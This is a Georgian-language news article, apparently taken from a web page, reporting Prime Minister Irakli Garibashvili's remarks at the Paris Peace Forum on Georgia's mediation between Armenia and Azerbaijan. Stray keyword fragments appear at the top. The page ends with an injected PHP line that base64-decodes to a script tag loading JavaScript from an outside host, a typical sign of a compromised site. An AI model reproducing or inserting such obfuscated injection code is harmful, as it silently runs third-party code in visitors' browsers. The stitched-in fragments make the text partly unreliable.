celsiusi
ავერსი საქკაბელი

ბოლო ათი წლის განმავლობაში, ჩვენ არაფერი არ გაგვიკეთებია ჩვენი სუვერენიტეტის, ტერიტორიული მთლიანობისა და ეროვნული ინტერესების ხარჯზე. ყველაფერს ვაკეთებთ ჩვენი ხალხისთვის. ყველაფერს ვაკეთებთ, რაც არის საუკეთესო ჩვენი მოსახლეობისა და ჩვენი მომავლისთვის, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა პარიზის მშვიდობის ფორუმზე, პანელურ დისკუსიაზე განაცხადა.

საქართველოს მთავრობის მეთაურმა მადლობა გადაუხადა ფორუმის ორგანიზატორებს და პანელური დისკუსიის მოდერატორს.

„ყველაფერს ვაკეთებთ იმისთვის, რაც არის საუკეთესო ჩვენი მოსახლეობისა და ჩვენი მომავლისთვის. კიდევ ერთხელ, დიდი მადლობა, რომ მომეცით საშუალება გამომეთქვა ჩემი პოზიცია. დიდი მადლობა ორგანიზატორებს. ძალიან დიდი მადლობა თქვენ, ბატონო დიკლო“, – განაცხადა ირაკლი ღარიბაშვილმა.

საქართველოს პრემიერ-მინისტრმა პანელურ დისკუსიაზე სომხეთ-აზერბაიჯანს შორის საქართველოს მედიაციის როლზე გაამახვილა ყურადღება და აღნიშნა რომ მედიაციის პროცესში ნდობა გადამწყვეტია.

„ორი წლის წინ ჩვენ წარმატებით ჩავატარეთ მედიაცია, შუამავლობა. ეს იყო ერთ-ერთი პრეცედენტი მედიაციის, რომელიც შევქმენით პრემიერ-მინისტრ ფაშინიანთან და პრეზიდენტ ალიევთან, როდესაც 15 ტყვე გაათავისუფლა აზერბაიჯანმა ქართული შუამავლობით და სომხეთმა გადასცა დანაღმული ტერიტორიების რუკა. საქართველოს შეუძლია, მიაღწიოს აღნიშნულ შედეგებს და ნდობა აქ გადამწყვეტია, რადგან თუ ვინმე შუამავლობას, მედიაციას სთავაზობს, ორივე მხარე უნდა ენდობოდეს მას. ნდობა თუ არ იქნება, არ იქნება წარმატებული შუამავლობა და დავოსში გავაკეთე განცხადება იანვარში. შეიძლება, მხარეები ერთმანეთს არ ენდობოდნენ, მაგრამ უნდა არსებობდეს თანამშრომლობა. მოლაპარაკების, მშვიდობიანი დიალოგის გარეშე არ დაისადგურებს მშვიდობა“, – განაცხადა ირაკლი ღარიბაშვილმა.

216
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");